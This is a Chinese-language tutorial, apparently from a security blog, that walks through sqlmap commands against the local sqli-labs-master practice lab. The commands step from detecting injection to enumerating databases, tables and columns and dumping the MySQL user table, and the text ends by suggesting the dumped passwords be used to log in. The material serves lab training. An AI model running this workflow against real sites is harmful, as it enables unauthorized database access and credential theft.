利用kali自带的sqlmap注入sqli-labs-master

sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。

GET型的sqlmap爆破。

1、检测目标的版本

sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1

效果图如下:

利用kali自带的sqlmap注入sqli-labs-master

2、检测目标的数据库

sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1 --dbs

效果图如下:

利用kali自带的sqlmap注入sqli-labs-master

3、检测目标数据库中的表(batch的意思是不用一直yes,直接运行到底)

sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1 --tables -D mysql --batch

效果图如下:

利用kali自带的sqlmap注入sqli-labs-master

4、检测表里有哪些字段(–column列出字段 ,-T后面+表名,-D后面+数据库名)

sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1 --column -T user -D mysql --batch

效果图如下:

利用kali自带的sqlmap注入sqli-labs-master

5、这时可以看看字段里有什么数据(-C查看字段,–dump是把所有的记录列出来)

sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1 -C User -T user -D mysql --batch --dump

效果图如下:

利用kali自带的sqlmap注入sqli-labs-master

这样我们就可以找到包含密码的数据库,然后进行登录了

给TA打赏
共{{data.count}}人
人已打赏
各种教程

漏洞靶场:通过phpstudy搭建自己的靶机

2020-3-25 22:18:29

各种教程精品软件

两款网站后门在线查杀webshell工具

2020-6-10 10:12:51

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索